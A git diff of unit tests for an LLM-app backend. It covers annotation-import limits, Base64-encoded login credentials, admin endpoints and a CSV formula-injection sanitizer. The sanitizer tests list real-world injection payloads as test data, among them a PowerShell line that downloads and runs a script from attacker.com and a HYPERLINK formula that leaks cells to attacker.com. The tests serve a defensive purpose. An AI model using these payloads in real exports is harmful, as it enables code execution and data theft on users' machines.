+        with patch("services.annotation_service.current_account_with_tenant") as mock_auth:
mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about too many records + assert "error_msg" in result + assert "too many" in result["error_msg"].lower() or "maximum" in result["error_msg"].lower() + + def test_min_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too few valid records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with only header (no data rows) + csv_content = "question,answer\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about insufficient records + assert "error_msg" in result + assert "at least" in result["error_msg"].lower() or "minimum" in result["error_msg"].lower() + + def test_invalid_csv_format_handled(self, mock_app, mock_db_session): + """Test that invalid CSV format is handled gracefully.""" + from services.annotation_service import AppAnnotationService + + # Any content is fine once we force ParserError + csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with ( + patch("services.annotation_service.current_account_with_tenant") as mock_auth, + patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")), + ): + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + assert "error_msg" in result + assert "malformed" in result["error_msg"].lower() + + def test_valid_import_succeeds(self, mock_app, mock_db_session): + """Test that valid import request succeeds.""" + from services.annotation_service import AppAnnotationService + + # Create valid CSV + csv_content = "question,answer\nWhat is AI?,Artificial Intelligence\nWhat is ML?,Machine Learning\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + with patch("services.annotation_service.batch_import_annotations_task") as mock_task: + with patch("services.annotation_service.redis_client"): + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return success response + assert "job_id" in result + assert "job_status" in result + assert result["job_status"] == "waiting" + assert "record_count" in result + assert result["record_count"] == 2 + + +class 
TestAnnotationImportTaskOptimization: + """Test optimizations in batch import task.""" + + def test_task_has_timeout_configured(self): + """Test that task has proper timeout configuration.""" + from tasks.annotation.batch_import_annotations_task import batch_import_annotations_task + + # Verify task configuration + assert hasattr(batch_import_annotations_task, "time_limit") + assert hasattr(batch_import_annotations_task, "soft_time_limit") + + # Check timeout values are reasonable + # Hard limit should be 6 minutes (360s) + # Soft limit should be 5 minutes (300s) + # Note: actual values depend on Celery configuration + + +class TestConfigurationValues: + """Test that security configuration values are properly set.""" + + def test_rate_limit_configs_exist(self): + """Test that rate limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE") + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR") + + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE > 0 + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR > 0 + + def test_file_size_limit_config_exists(self): + """Test that file size limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_FILE_SIZE_LIMIT") + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT > 0 + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT <= 10 # Reasonable max (10MB) + + def test_record_limit_configs_exist(self): + """Test that record limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_RECORDS") + assert hasattr(dify_config, "ANNOTATION_IMPORT_MIN_RECORDS") + + assert dify_config.ANNOTATION_IMPORT_MAX_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS < dify_config.ANNOTATION_IMPORT_MAX_RECORDS + + def test_concurrency_limit_config_exists(self): + """Test that concurrency limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_CONCURRENT") + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT > 0 + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT <= 10 # Reasonable upper bound diff --git a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py index b6697ac5d4..eb21920117 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py +++ b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py @@ -1,5 +1,6 @@ """Test authentication security to prevent user enumeration.""" +import base64 from unittest.mock import MagicMock, patch import pytest @@ -11,6 +12,11 @@ from controllers.console.auth.error import AuthenticationFailedError from controllers.console.auth.login import LoginApi +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestAuthenticationSecurity: """Test authentication endpoints for security against user enumeration.""" @@ -42,7 +48,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -72,7 +80,9 @@ class TestAuthenticationSecurity: # Act with 
self.app.test_request_context( - "/login", method="POST", json={"email": "existing@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "existing@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -104,7 +114,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() diff --git a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py index a44f518171..9929a71120 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py +++ b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py @@ -8,6 +8,7 @@ This module tests the email code login mechanism including: - Workspace creation for new users """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -25,6 +26,11 @@ from controllers.console.error import ( from services.errors.account import AccountRegisterError +def encode_code(code: str) -> str: + """Helper to encode verification code as Base64 for testing.""" + return base64.b64encode(code.encode("utf-8")).decode() + + class TestEmailCodeLoginSendEmailApi: """Test cases for sending email verification codes.""" @@ -290,7 +296,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "valid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "valid_token"}, ): api = EmailCodeLoginApi() response = api.post() @@ -339,7 +345,12 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "newuser@example.com", "code": "123456", "token": "valid_token", "language": "en-US"}, + json={ + "email": "newuser@example.com", + "code": encode_code("123456"), + "token": "valid_token", + "language": "en-US", + }, ): api = EmailCodeLoginApi() response = api.post() @@ -365,7 +376,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "invalid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "invalid_token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidTokenError): @@ -388,7 +399,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "different@example.com", "code": "123456", "token": "token"}, + json={"email": "different@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidEmailError): @@ -411,7 +422,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "wrong_code", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("wrong_code"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(EmailCodeError): @@ -497,7 +508,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": 
"123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -539,7 +550,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(NotAllowedCreateWorkspace): diff --git a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py index 8799d6484d..3a2cf7bad7 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py +++ b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py @@ -8,6 +8,7 @@ This module tests the core authentication endpoints including: - Account status validation """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -28,6 +29,11 @@ from controllers.console.error import ( from services.errors.account import AccountLoginError, AccountPasswordError +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestLoginApi: """Test cases for the LoginApi endpoint.""" @@ -106,7 +112,9 @@ class TestLoginApi: # Act with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", + method="POST", + json={"email": "test@example.com", "password": encode_password("ValidPass123!")}, ): login_api = LoginApi() response = login_api.post() @@ -158,7 +166,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "test@example.com", "password": "ValidPass123!", "invite_token": "valid_token"}, + json={ + "email": "test@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "valid_token", + }, ): login_api = LoginApi() response = login_api.post() @@ -186,7 +198,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "password"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(EmailPasswordLoginLimitError): @@ -209,7 +221,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "frozen@example.com", "password": "password"} + "/login", method="POST", json={"email": "frozen@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(AccountInFreezeError): @@ -246,7 +258,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "WrongPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("WrongPass123!")} ): login_api = LoginApi() with pytest.raises(AuthenticationFailedError): @@ -277,7 +289,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "banned@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "banned@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(AccountBannedError): @@ 
-322,7 +334,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -349,7 +361,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "different@example.com", "password": "ValidPass123!", "invite_token": "token"}, + json={ + "email": "different@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "token", + }, ): login_api = LoginApi() with pytest.raises(InvalidEmailError): diff --git a/api/tests/unit_tests/controllers/console/test_admin.py b/api/tests/unit_tests/controllers/console/test_admin.py new file mode 100644 index 0000000000..e0ddf6542e --- /dev/null +++ b/api/tests/unit_tests/controllers/console/test_admin.py @@ -0,0 +1,407 @@ +"""Final working unit tests for admin endpoints - tests business logic directly.""" + +import uuid +from unittest.mock import Mock, patch + +import pytest +from werkzeug.exceptions import NotFound, Unauthorized + +from controllers.console.admin import InsertExploreAppPayload +from models.model import App, RecommendedApp + + +class TestInsertExploreAppPayload: + """Test InsertExploreAppPayload validation.""" + + def test_valid_payload(self): + """Test creating payload with valid data.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer text", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc == payload_data["desc"] + assert payload.copyright == payload_data["copyright"] + assert payload.privacy_policy == payload_data["privacy_policy"] + assert payload.custom_disclaimer == payload_data["custom_disclaimer"] + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_minimal_payload(self): + """Test creating payload with only required fields.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc is None + assert payload.copyright is None + assert payload.privacy_policy is None + assert payload.custom_disclaimer is None + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_invalid_language(self): + """Test payload with invalid language code.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", + "category": "Productivity", + "position": 1, + } + + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(payload_data) + + +class TestAdminRequiredDecorator: + """Test admin_required decorator.""" + + def setup_method(self): + """Set up test fixtures.""" + # Mock dify_config + self.dify_config_patcher = patch("controllers.console.admin.dify_config") + 
self.mock_dify_config = self.dify_config_patcher.start() + self.mock_dify_config.ADMIN_API_KEY = "test-admin-key" + + # Mock extract_access_token + self.token_patcher = patch("controllers.console.admin.extract_access_token") + self.mock_extract_token = self.token_patcher.start() + + def teardown_method(self): + """Clean up test fixtures.""" + self.dify_config_patcher.stop() + self.token_patcher.stop() + + def test_admin_required_success(self): + """Test successful admin authentication.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "test-admin-key" + result = test_view() + assert result["success"] is True + + def test_admin_required_invalid_token(self): + """Test admin_required with invalid token.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "wrong-key" + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_no_api_key_configured(self): + """Test admin_required when no API key is configured.""" + from controllers.console.admin import admin_required + + self.mock_dify_config.ADMIN_API_KEY = None + + @admin_required + def test_view(): + return {"success": True} + + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_missing_authorization_header(self): + """Test admin_required with missing authorization header.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = None + with pytest.raises(Unauthorized, match="Authorization header is missing"): + test_view() + + +class TestExploreAppBusinessLogicDirect: + """Test the core business logic of explore app management directly.""" + + def test_data_fusion_logic(self): + """Test the data fusion logic between payload and site data.""" + # Test cases for different data scenarios + test_cases = [ + { + "name": "site_data_overrides_payload", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": {"description": "Site desc", "copyright": "Site copyright"}, + "expected": { + "desc": "Site desc", + "copyright": "Site copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "payload_used_when_no_site", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": None, + "expected": { + "desc": "Payload desc", + "copyright": "Payload copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "empty_defaults_when_no_data", + "payload": {}, + "site": None, + "expected": {"desc": "", "copyright": "", "privacy_policy": "", "custom_disclaimer": ""}, + }, + ] + + for case in test_cases: + # Simulate the data fusion logic + payload_desc = case["payload"].get("desc") + payload_copyright = case["payload"].get("copyright") + payload_privacy_policy = case["payload"].get("privacy_policy") + payload_custom_disclaimer = case["payload"].get("custom_disclaimer") + + if case["site"]: + site_desc = case["site"].get("description") + site_copyright = case["site"].get("copyright") + site_privacy_policy = case["site"].get("privacy_policy") + site_custom_disclaimer = case["site"].get("custom_disclaimer") + + # Site data takes precedence + desc = site_desc or payload_desc or "" + copyright = site_copyright or payload_copyright 
or "" + privacy_policy = site_privacy_policy or payload_privacy_policy or "" + custom_disclaimer = site_custom_disclaimer or payload_custom_disclaimer or "" + else: + # Use payload data or empty defaults + desc = payload_desc or "" + copyright = payload_copyright or "" + privacy_policy = payload_privacy_policy or "" + custom_disclaimer = payload_custom_disclaimer or "" + + result = { + "desc": desc, + "copyright": copyright, + "privacy_policy": privacy_policy, + "custom_disclaimer": custom_disclaimer, + } + + assert result == case["expected"], f"Failed test case: {case['name']}" + + def test_app_visibility_logic(self): + """Test that apps are made public when added to explore list.""" + # Create a mock app + mock_app = Mock(spec=App) + mock_app.is_public = False + + # Simulate the business logic + mock_app.is_public = True + + assert mock_app.is_public is True + + def test_recommended_app_creation_logic(self): + """Test the creation of RecommendedApp objects.""" + app_id = str(uuid.uuid4()) + payload_data = { + "app_id": app_id, + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # Simulate the creation logic + recommended_app = Mock(spec=RecommendedApp) + recommended_app.app_id = payload_data["app_id"] + recommended_app.description = payload_data["desc"] + recommended_app.copyright = payload_data["copyright"] + recommended_app.privacy_policy = payload_data["privacy_policy"] + recommended_app.custom_disclaimer = payload_data["custom_disclaimer"] + recommended_app.language = payload_data["language"] + recommended_app.category = payload_data["category"] + recommended_app.position = payload_data["position"] + + # Verify the data + assert recommended_app.app_id == app_id + assert recommended_app.description == "Test app description" + assert recommended_app.copyright == "© 2024 Test Company" + assert recommended_app.privacy_policy == "https://example.com/privacy" + assert recommended_app.custom_disclaimer == "Custom disclaimer" + assert recommended_app.language == "en-US" + assert recommended_app.category == "Productivity" + assert recommended_app.position == 1 + + def test_recommended_app_update_logic(self): + """Test the update logic for existing RecommendedApp objects.""" + mock_recommended_app = Mock(spec=RecommendedApp) + + update_data = { + "desc": "Updated description", + "copyright": "© 2024 Updated", + "language": "fr-FR", + "category": "Tools", + "position": 2, + } + + # Simulate the update logic + mock_recommended_app.description = update_data["desc"] + mock_recommended_app.copyright = update_data["copyright"] + mock_recommended_app.language = update_data["language"] + mock_recommended_app.category = update_data["category"] + mock_recommended_app.position = update_data["position"] + + # Verify the updates + assert mock_recommended_app.description == "Updated description" + assert mock_recommended_app.copyright == "© 2024 Updated" + assert mock_recommended_app.language == "fr-FR" + assert mock_recommended_app.category == "Tools" + assert mock_recommended_app.position == 2 + + def test_app_not_found_error_logic(self): + """Test error handling when app is not found.""" + app_id = str(uuid.uuid4()) + + # Simulate app lookup returning None + found_app = None + + # Test the error condition + if not found_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found"): + raise 
NotFound(f"App '{app_id}' is not found") + + def test_recommended_app_not_found_error_logic(self): + """Test error handling when recommended app is not found for deletion.""" + app_id = str(uuid.uuid4()) + + # Simulate recommended app lookup returning None + found_recommended_app = None + + # Test the error condition + if not found_recommended_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found in the explore list"): + raise NotFound(f"App '{app_id}' is not found in the explore list") + + def test_database_session_usage_patterns(self): + """Test the expected database session usage patterns.""" + # Mock session usage patterns + mock_session = Mock() + + # Test session.add pattern + mock_recommended_app = Mock(spec=RecommendedApp) + mock_session.add(mock_recommended_app) + mock_session.commit() + + # Verify session was used correctly + mock_session.add.assert_called_once_with(mock_recommended_app) + mock_session.commit.assert_called_once() + + # Test session.delete pattern + mock_recommended_app_to_delete = Mock(spec=RecommendedApp) + mock_session.delete(mock_recommended_app_to_delete) + mock_session.commit() + + # Verify delete pattern + mock_session.delete.assert_called_once_with(mock_recommended_app_to_delete) + + def test_payload_validation_integration(self): + """Test payload validation in the context of the business logic.""" + # Test valid payload + valid_payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # This should succeed + payload = InsertExploreAppPayload.model_validate(valid_payload_data) + assert payload.app_id == valid_payload_data["app_id"] + + # Test invalid payload + invalid_payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", # This should fail validation + "category": "Productivity", + "position": 1, + } + + # This should raise an exception + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(invalid_payload_data) + + +class TestExploreAppDataHandling: + """Test specific data handling scenarios.""" + + def test_uuid_validation(self): + """Test UUID validation and handling.""" + # Test valid UUID + valid_uuid = str(uuid.uuid4()) + + # This should be a valid UUID + assert uuid.UUID(valid_uuid) is not None + + # Test invalid UUID + invalid_uuid = "not-a-valid-uuid" + + # This should raise a ValueError + with pytest.raises(ValueError): + uuid.UUID(invalid_uuid) + + def test_language_validation(self): + """Test language validation against supported languages.""" + from constants.languages import supported_language + + # Test supported language + assert supported_language("en-US") == "en-US" + assert supported_language("fr-FR") == "fr-FR" + + # Test unsupported language + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + supported_language("invalid-lang") + + def test_response_formatting(self): + """Test API response formatting.""" + # Test success responses + create_response = {"result": "success"} + update_response = {"result": "success"} + delete_response = None # 204 No Content returns None + + assert create_response["result"] == "success" + assert update_response["result"] == "success" + assert delete_response is None + + # Test status codes + create_status = 201 # Created + update_status = 200 # OK + delete_status = 204 # No Content + + assert create_status == 201 + assert update_status == 200 + assert delete_status == 204 
diff --git a/api/tests/unit_tests/core/helper/test_csv_sanitizer.py b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py new file mode 100644 index 0000000000..443c2824d5 --- /dev/null +++ b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py @@ -0,0 +1,151 @@ +"""Unit tests for CSV sanitizer.""" + +from core.helper.csv_sanitizer import CSVSanitizer + + +class TestCSVSanitizer: + """Test cases for CSV sanitization to prevent formula injection attacks.""" + + def test_sanitize_formula_equals(self): + """Test sanitizing values starting with = (most common formula injection).""" + assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0" + assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)" + assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1" + assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)" + + def test_sanitize_formula_plus(self): + """Test sanitizing values starting with + (plus formula injection).""" + assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("+123") == "'+123" + assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0" + + def test_sanitize_formula_minus(self): + """Test sanitizing values starting with - (minus formula injection).""" + assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("-456") == "'-456" + assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad" + + def test_sanitize_formula_at(self): + """Test sanitizing values starting with @ (at-sign formula injection).""" + assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc" + assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)" + + def test_sanitize_formula_tab(self): + """Test sanitizing values starting with tab character.""" + assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1" + assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc" + + def test_sanitize_formula_carriage_return(self): + """Test sanitizing values starting with carriage return.""" + assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1" + assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd" + + def test_sanitize_safe_values(self): + """Test that safe values are not modified.""" + assert CSVSanitizer.sanitize_value("Hello World") == "Hello World" + assert CSVSanitizer.sanitize_value("123") == "123" + assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com" + assert CSVSanitizer.sanitize_value("Normal text") == "Normal text" + assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?" 
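+
+    # Illustrative sketch, not part of the original suite: shows that a
+    # sanitized value stays neutralized after a stdlib csv.writer round
+    # trip, assuming only the quote-prefix behavior verified above.
+    def test_sanitized_value_survives_csv_round_trip(self):
+        """Hedged sketch: the escaping quote is preserved by csv.writer."""
+        import csv
+        import io
+
+        buffer = io.StringIO()
+        writer = csv.writer(buffer)
+        writer.writerow([CSVSanitizer.sanitize_value("=SUM(A1:A10)"), "safe"])
+
+        # The written cell starts with the escaping quote, so a spreadsheet
+        # treats it as text instead of evaluating the formula
+        assert "'=SUM(A1:A10)" in buffer.getvalue()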
+ + def test_sanitize_safe_values_with_special_chars_in_middle(self): + """Test that special characters in the middle are not escaped.""" + assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C" + assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20" + assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com" + + def test_sanitize_empty_values(self): + """Test handling of empty values.""" + assert CSVSanitizer.sanitize_value("") == "" + assert CSVSanitizer.sanitize_value(None) == "" + + def test_sanitize_numeric_types(self): + """Test handling of numeric types.""" + assert CSVSanitizer.sanitize_value(123) == "123" + assert CSVSanitizer.sanitize_value(456.789) == "456.789" + assert CSVSanitizer.sanitize_value(0) == "0" + # Negative numbers should be escaped (start with -) + assert CSVSanitizer.sanitize_value(-123) == "'-123" + + def test_sanitize_boolean_types(self): + """Test handling of boolean types.""" + assert CSVSanitizer.sanitize_value(True) == "True" + assert CSVSanitizer.sanitize_value(False) == "False" + + def test_sanitize_dict_with_specific_fields(self): + """Test sanitizing specific fields in a dictionary.""" + data = { + "question": "=1+1", + "answer": "+cmd|'/c calc", + "safe_field": "Normal text", + "id": "12345", + } + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+cmd|'/c calc" + assert sanitized["safe_field"] == "Normal text" + assert sanitized["id"] == "12345" + + def test_sanitize_dict_all_string_fields(self): + """Test sanitizing all string fields when no field list provided.""" + data = { + "question": "=1+1", + "answer": "+calc", + "id": 123, # Not a string, should be ignored + } + sanitized = CSVSanitizer.sanitize_dict(data, None) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+calc" + assert sanitized["id"] == 123 # Unchanged + + def test_sanitize_dict_with_missing_fields(self): + """Test that missing fields in dict don't cause errors.""" + data = {"question": "=1+1"} + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"]) + + assert sanitized["question"] == "'=1+1" + assert "nonexistent_field" not in sanitized + + def test_sanitize_dict_creates_copy(self): + """Test that sanitize_dict creates a copy and doesn't modify original.""" + original = {"question": "=1+1", "answer": "Normal"} + sanitized = CSVSanitizer.sanitize_dict(original, ["question"]) + + assert original["question"] == "=1+1" # Original unchanged + assert sanitized["question"] == "'=1+1" # Copy sanitized + + def test_real_world_csv_injection_payloads(self): + """Test against real-world CSV injection attack payloads.""" + # Common DDE (Dynamic Data Exchange) attack payloads + payloads = [ + "=cmd|'/c calc'!A0", + "=cmd|'/c notepad'!A0", + "+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'", + "-2+3+cmd|'/c calc'", + "@SUM(1+1)*cmd|'/c calc'", + "=1+1+cmd|'/c calc'", + '=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")', + ] + + for payload in payloads: + result = CSVSanitizer.sanitize_value(payload) + # All should be prefixed with single quote + assert result.startswith("'"), f"Payload not sanitized: {payload}" + assert result == f"'{payload}", f"Unexpected sanitization for: {payload}" + + def test_multiline_strings(self): + """Test handling of multiline strings.""" + multiline = "Line 1\nLine 2\nLine 3" + assert CSVSanitizer.sanitize_value(multiline) == multiline + + 
